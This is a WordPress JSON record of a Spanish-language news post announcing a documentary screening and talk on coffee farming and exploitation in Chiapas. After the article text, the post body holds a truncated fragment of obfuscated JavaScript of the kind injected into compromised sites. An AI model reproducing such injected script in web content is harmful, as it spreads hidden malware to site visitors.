{"id":16752,"date":"2024-07-17T03:54:28","date_gmt":"2024-07-17T03:54:28","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16752"},"modified":"2024-07-17T03:54:29","modified_gmt":"2024-07-17T03:54:29","slug":"proyectaran-documental-sobre-la-importancia-del-cafe-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16752","title":{"rendered":"Proyectar\u00e1n documental sobre la importancia del caf\u00e9 en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"1009\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240716-WA0029.jpg\" alt=\"\" class=\"wp-image-16753\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240716-WA0029.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240716-WA0029-214x300.jpg 214w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>16 de junio del 2024. San Crist\u00f3bal de Las Casas.- Este s\u00e1bado 20 de julio, en el espacio cultural Sendas habr\u00e1 la proyecci\u00f3n y charla titulada &#8220;El caf\u00e9, la riqueza que producimos los pobres del campo&#8221;. Este evento, se llevar\u00e1 a cabo en la Calle Mar\u00eda Adelina Flores n\u00famero 50, de 5 de la tarde a 8 de la noche, promete ofrecer una visi\u00f3n profunda y reflexiva sobre la producci\u00f3n y explotaci\u00f3n del caf\u00e9 en Chiapas.<br>Seg\u00fan la invitaci\u00f3n, la jornada iniciar\u00e1 con la proyecci\u00f3n del documental realizado por Carlos Mart\u00ednez Su\u00e1rez, una obra que expone las consecuencias sociales y econ\u00f3micas de la producci\u00f3n y cultivo del caf\u00e9, y c\u00f3mo este producto ha influido en el desarrollo hist\u00f3rico del estado de Chiapas. \u201cEl documental no solo muestra la realidad de los caficultores, sino que tambi\u00e9n explora las din\u00e1micas de explotaci\u00f3n que persisten en la industria del caf\u00e9\u201d.<br>Tras la proyecci\u00f3n, se abrir\u00e1 un espacio para los comentarios y an\u00e1lisis, en el que participar\u00e1n destacados especialistas y protagonistas del sector. Jorge Santiago, Coordinador del gui\u00f3n y la investigaci\u00f3n colectiva para la pel\u00edcula por parte de Desmi A.C., compartir\u00e1 su perspectiva y experiencias en la elaboraci\u00f3n del documental.<br>Adem\u00e1s, Eliazar P\u00e9rez Cruz, caficultor, barista y catador de caf\u00e9, aportar\u00e1 su conocimiento desde la pr\u00e1ctica diaria y el contacto directo con la tierra y el cultivo del caf\u00e9.<br>\u201cEste evento es una oportunidad \u00fanica para conocer de primera mano las historias y luchas de los caficultores chiapanecos, y para reflexionar sobre el impacto social y econ\u00f3mico del caf\u00e9, una de las principales riquezas producidas en el campo mexicano. La proyecci\u00f3n y la charla no solo buscan informar, sino tambi\u00e9n fomentar el di\u00e1logo y la conciencia sobre las realidades que enfrentan los productores de caf\u00e9\u201d, concluyen los organizadores.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 16 de junio del 2024. San Crist\u00f3bal de Las Casas.- Este s\u00e1bado 20 de julio, en el espacio cultural Sendas habr\u00e1 la proyecci\u00f3n y charla titulada &#8220;El caf\u00e9, la riqueza que producimos los pobres del campo&#8221;. Este evento, se llevar\u00e1 a cabo en la Calle Mar\u00eda Adelina Flores n\u00famero 50, de 5 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16753,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-16752","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16752","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16752"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16752\/revisions"}],"predecessor-version":[{"id":16754,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16752\/revisions\/16754"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16753"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16752"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16752"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16752"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}